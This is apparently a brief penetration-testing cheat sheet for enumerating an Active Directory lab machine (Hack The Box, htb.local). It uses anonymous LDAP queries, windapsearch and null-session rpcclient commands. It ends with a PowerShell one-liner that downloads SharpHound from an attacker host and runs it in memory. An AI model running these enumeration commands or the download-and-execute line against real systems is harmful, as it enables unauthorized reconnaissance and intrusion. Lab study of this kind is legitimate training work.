Tools
LDAP
ldapsearch
To check if anonymous binds are allowed, you can perform a simple LDAP bind operation without providing any credentials and see if it succeeds or fails:
ldapsearch -H ldap://10.10.10.161 -x -b 'dc=htb,dc=local' -s base
# -x for anonymous auth, -b to specify base DC, -s for scope
windapsearch
If LDAP is open, we can enumerate users, computers, and groups using windapsearch
windapsearch -d htb.local --dc 10.10.10.161 -m users --attrs samaccountname | grep -i samaccountname
windapsearch -d htb.local --dc 10.10.10.161 -m computers
windapsearch -d htb.local --dc 10.10.10.161 -m groups | grep cn | awk -F\: '{print $2}'
RPC
If RPC is open, we can enumerate users, computers, and groups.
# Connect to RPC anonymously
rpcclient -U "" -N 10.10.10.161
# Enumerate Users
rpcclient $> enumdomusers
# Enumerate Groups
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
# Query Group
rpcclient $> querygroup 0x200
# Query Group member
rpcclient $> querygroupmem 0x200
#Query User
rid:[0x1f4] attr:[0x7]
rpcclient $> queryuser 0x1f4
BloodHound
Upload SharpHound to collect data.
iex(new-object net.webclient).downloadstring("http://10.10.14.9/SharpHound.ps1")
Last updated